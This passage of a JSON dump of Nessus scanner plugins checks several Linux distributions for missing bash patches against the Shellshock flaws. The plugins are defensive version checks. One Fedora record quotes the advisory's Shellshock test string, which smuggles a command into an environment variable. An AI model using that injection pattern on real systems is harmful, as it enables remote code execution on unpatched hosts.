+\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:17", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bash (OVMSA-2014-0022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2014-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/78238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78238);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.2 : bash (OVMSA-2014-0022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check 
for fishy environment Resolves: #1141644\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000223.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f4b2b7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:49", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-2.NASL", "href": "https://www.tenable.com/plugins/nessus/77898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77898);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the\npatch for CVE-2014-7169 didn't get properly applied in the Ubuntu\n14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. 
An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-2/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:09", "description": "bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in environment variables passed at startup time. This allowed code execution by local or remote attackers who could pass environment variables to bash scripts. 
(CVE-2014-6271)", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9740)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140919.NASL", "href": "https://www.tenable.com/plugins/nessus/77850", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77850);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9740)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in\nenvironment variables passed at startup time. This allowed code\nexecution by local or remote attackers who could pass environment\nvariables to bash scripts. 
(CVE-2014-6271)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.20.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-04T14:50:17", "description": "Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This account is currently not available.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11503.NASL", "href": "https://www.tenable.com/plugins/nessus/77876", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11503.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77876);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"FEDORA\", value:\"2014-11503\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Disclosure - http://www.openwall.com/lists/oss-security/2014/09/24/10\n\nBehaviour prior to patch :\n\n$ env x='() { :;}; echo OOPS' bash -c /usr/sbin/nologin OOPS This\naccount is currently not available.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openwall.com/lists/oss-security/2014/09/24/10\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138675.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f6f0bbc5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.47-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:28", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). 
Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/nessus/77828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1293. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77828);\n script_version(\"1.41\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. 
Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 
